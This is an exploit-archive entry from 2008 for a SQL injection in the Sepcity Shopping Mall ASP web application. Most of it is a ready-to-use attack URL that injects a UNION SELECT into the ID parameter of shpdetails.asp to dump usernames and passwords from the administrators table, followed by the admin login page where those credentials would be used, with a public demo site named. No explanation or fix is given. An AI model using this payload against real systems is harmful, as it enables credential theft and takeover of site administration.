[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Sepcity Shopping Mall (shpdetails.asp ID) SQL Injection Vulnerability
# Published : 2008-12-29
# Author : Osmanizim
# Previous Title : Ultimate PHP Board <= 2.2.1 (log inj) Privilege Escalation Exploit
# Next Title : Sepcity Lawyer Portal (deptdisplay.asp ID) SQL Injection Vulnerability


#By Osmanizim 
#Security Specialist
#Contacts > :(  www.osmanizim.com
#Title: Shopping Mall <=  SQL Injection Vulnerability.
#Demo : http://freeasp.sepcity.com/shopmall/default.asp



//  Exploit -->


http://localhost/shopmall/shpdetails.asp?ID=1 union select 0,1,2,username,password,5,6,7,8,9 from administrators




// Admin -->


http://localhost/shopmall/admlogin.asp?

# www.Syue.com [2008-12-29]